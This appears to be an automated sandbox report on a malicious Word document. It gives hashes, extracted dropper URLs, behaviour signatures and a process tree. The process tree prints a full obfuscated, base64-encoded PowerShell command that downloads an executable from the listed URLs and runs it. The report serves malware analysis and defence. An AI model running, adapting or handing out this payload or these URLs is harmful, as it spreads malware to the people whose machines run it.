Analysis

  • max time kernel
    115s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 09:13

General

  • Target

    4ed3b936d9b0ffb44be013208f756abbca27cca3ee96b46494369f2e82aa430d.doc

  • Size

    159KB

  • MD5

    2abc2a9e9fe7323678681a2e7eeaea56

  • SHA1

    5ece19aaa636c94321694d9eaa4ba936bba54760

  • SHA256

    4ed3b936d9b0ffb44be013208f756abbca27cca3ee96b46494369f2e82aa430d

  • SHA512

    bbf3e6fe257bc98ca34efe9d02bdd093ec4032bb0d11acb7e0426bc98c703a030f1b3886a2fd977a92c64a1ba29e6e7bf088e94e485fbb7fa83ccbedab087b29

  • SSDEEP

    1536:kcLzncLzMrdi1Ir77zOH98Wj2gpngx+a9TLln2/5k+:9rfrzOH98ipg3L05k+

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://wynn838.com/wp-content/enE/

exe.dropper

https://sertres.com/ivmej/p/

exe.dropper

https://viaje-achina.com/wp-admin/aG/

exe.dropper

https://aszcasino.com/aszdemo/AGA/

exe.dropper

https://bintangremaja.com/wp-content/U/

exe.dropper

https://phongkhamthaiduongbienhoa.vn/wp-admin/Z/

exe.dropper

http://hk.olivellaline.com/gbi1e/2/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4ed3b936d9b0ffb44be013208f756abbca27cca3ee96b46494369f2e82aa430d.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABGAHoAcABuAGIAMwBrAD0AKAAnAEYAJwArACgAJwA2AG8AJwArACcAcQBvAGUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBQAFIAbwBGAEkATABFAFwAVABwAHoANABTAFEAMQBcAFgAQwBJAGIAMwBnAHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAdQBgAFIAaQBUAHkAUABSAGAATwB0AE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADIALAAnACsAJwAgAHQAbABzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABUAG0AZwB6AHkAZgBfACAAPQAgACgAJwBNACcAKwAoACcAbwB0ADYAJwArACcAMABuAGUAcgAnACsAJwBhACcAKQApADsAJABJAGwAMQBfAHAAdQA0AD0AKAAoACcATQAwADIAJwArACcAdwAyACcAKQArACcAXwAnACsAJwBlACcAKQA7ACQAWAAxAGIAaABuADkAYgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADYAJwArACcAbwBuAFQAJwApACsAKAAnAHAAegAnACsAJwA0ACcAKQArACcAcwAnACsAKAAnAHEAJwArACcAMQA2AG8AJwArACcAbgBYAGMAaQBiACcAKQArACcAMwBnACcAKwAnAHQAJwArACcANgAnACsAJwBvAG4AJwApAC4AIgByAGUAUABgAEwAQQBDAGUAIgAoACgAJwA2AG8AJwArACcAbgAnACkALABbAFMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQArACQAVABtAGcAegB5AGYAXwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAFAAeABiAGoAdgAzAGsAPQAoACgAJwBQACcAKwAnAG8AeAAnACkAKwAnAHoANwAnACsAJwA2AHUAJwApADsAJABNAG4AbQBtAGMAYwAwAD0AJgAoACcAbgBlACcAKwAnAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcAZQBCAEMATABpAGUATgB0ADsAJABSAGoAYwBlADQAdgA0AD0AKAAnAGgAJwArACcAdAAnACsAJwB0AHAAJwArACcAOgAvACcAKwAoACcALwB3ACcAKwAnAHkAJwApACsAKAAnAG4AbgAnACsAJwA4ACcAKQArACgAJwAzADgALgAnACsAJwBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwArACcAbgB0AC8AJwApACsAKAAnAGUAbgAnACsAJwBFACcAKQArACcALwAnACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AcwBlAHIAdAByACcAKwAnAGUAcwAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwAnACsAJwBpAHYAJwArACcAbQBlAGoALwBwAC8AKgBoACcAKwAnAHQAdAAnACkAKwAoACcAcABzADoALwAvACcAKwAnAHYAJwArACcAaQAnACkAKwAoACcAYQBqAGUAJwArACcALQBhACcAKQArACcAYwBoACcAKwAoACcAaQAnACsAJwBuAGEAJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQBHAC8AKgAnACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAnAHMAJwArACcAOgAnACsAJwAvACcAKwAnAC8AYQBzAHoAJwApACsAJwBjAGEAJwArACcAcwAnACsAJwBpACcAKwAoACcAbgBvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBhACcAKQArACcAcwB6ACcAKwAnAGQAJwArACgAJwBlACcAKwAnAG0AbwAvACcAKQArACgAJwBBAEcAQQAnACsAJwAvACoAaAB0AHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBiACcAKQArACgAJwBpACcAKwAnAG4AdABhACcAKQArACcAbgBnACcAKwAoACcAcgBlAG0AYQBqACcAKwAnAGEALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwB3ACcAKQArACgAJwBwAC0AYwBvAG4AJwArACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AJwArACgAJwBVAC8AJwArACcAKgBoACcAKQArACgAJwB0AHQAcABzADoAJwArACcALwAvACcAKQArACgAJwBwAGgAJwArACcAbwAnACkAKwAoACcAbgBnACcAKwAnAGsAJwApACsAJwBoACcAKwAoACcAYQBtACcAKwAnAHQAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBpAGQAdQBvACcAKwAnAG4AJwArACcAZwBiAGkAJwArACcAZQAnACsAJwBuACcAKwAnAGgAbwBhAC4AdgBuAC8AdwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAbgAvACcAKwAnAFoALwAqAGgAJwApACsAKAAnAHQAdABwADoALwAvACcAKwAnAGgAawAuAG8AJwArACcAbAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAGUAJwArACcAbABsAGEAbABpAG4AZQAuAGMAbwBtACcAKQArACgAJwAvACcAKwAnAGcAYgAnACkAKwAnAGkAJwArACcAMQAnACsAKAAnAGUALwAnACsAJwAyAC8AJwApACkALgAiAFMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgAwAHEAXwBiAGgAcQA9ACgAJwBRAGIAJwArACcAeAA1ACcAKwAoACcAZAAnACsAJwA2AHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABBAHEAZwBsAGoAeABmACAAaQBuACAAJABSAGoAYwBlADQAdgA0ACkAewB0AHIAeQB7ACQATQBuAG0AbQBjAGMAMAAuACIAZABPAHcAbgBgAEwATwBgAEEARABGAGkAYABMAGUAIgAoACQAQQBxAGcAbABqAHgAZgAsACAAJABYADEAYgBoAG4AOQBiACkAOwAkAFMAYQAzAHMAcQAyAHMAPQAoACgAJwBBAGwAJwArACcAcAAnACkAKwAoACcAYgA5ACcAKwAnAGQAJwApACsAJwBxACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABYADEAYgBoAG4AOQBiACkALgAiAEwAYABlAG4AYABHAFQASAAiACAALQBnAGUAIAAzADIANwA0ADIAKQAgAHsAJgAoACcASQBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQAnACsAJwBtACcAKQAoACQAWAAxAGIAaABuADkAYgApADsAJABWAGoANAB0AGUAOABuAD0AKAAnAEUAJwArACgAJwB3ACcAKwAnAHQAZgBxACcAKQArACcAbAAxACcAKQA7AGIAcgBlAGEAawA7ACQAQwAwADcAYwBjAHMAdwA9ACgAJwBZADAAJwArACcAMQAnACsAKAAnADQAbwAnACsAJwA4AHUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABrAHcANwBhAHYAPQAoACcASwAnACsAKAAnAGsAJwArACcAagBmADAAbgB2ACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1564

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1120-74-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-62-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1120-54-0x0000000072081000-0x0000000072084000-memory.dmp
      Filesize

      12KB

    • memory/1120-58-0x0000000070AED000-0x0000000070AF8000-memory.dmp
      Filesize

      44KB

    • memory/1120-77-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-60-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-75-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-61-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-63-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-65-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-64-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-66-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-67-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-68-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-69-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-70-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-71-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-73-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-72-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-57-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
      Filesize

      8KB

    • memory/1120-55-0x000000006FB01000-0x000000006FB03000-memory.dmp
      Filesize

      8KB

    • memory/1120-59-0x0000000070AED000-0x0000000070AF8000-memory.dmp
      Filesize

      44KB

    • memory/1120-76-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-80-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-79-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-78-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-81-0x0000000000763000-0x0000000000767000-memory.dmp
      Filesize

      16KB

    • memory/1120-93-0x0000000070AED000-0x0000000070AF8000-memory.dmp
      Filesize

      44KB

    • memory/1120-92-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1564-84-0x00000000026F4000-0x00000000026F7000-memory.dmp
      Filesize

      12KB

    • memory/1564-85-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp
      Filesize

      11.4MB

    • memory/1564-86-0x000000001B700000-0x000000001B9FF000-memory.dmp
      Filesize

      3.0MB

    • memory/1564-87-0x00000000026FB000-0x000000000271A000-memory.dmp
      Filesize

      124KB

    • memory/1564-89-0x00000000026F4000-0x00000000026F7000-memory.dmp
      Filesize

      12KB

    • memory/1564-91-0x00000000026FB000-0x000000000271A000-memory.dmp
      Filesize

      124KB

    • memory/1564-83-0x000007FEF3AA0000-0x000007FEF44C3000-memory.dmp
      Filesize

      10.1MB

    • memory/1564-82-0x000007FEFB731000-0x000007FEFB733000-memory.dmp
      Filesize

      8KB

    • memory/1564-94-0x00000000026F4000-0x00000000026F7000-memory.dmp
      Filesize

      12KB

    • memory/1564-95-0x00000000026FB000-0x000000000271A000-memory.dmp
      Filesize

      124KB

    • memory/1660-88-0x0000000000000000-mapping.dmp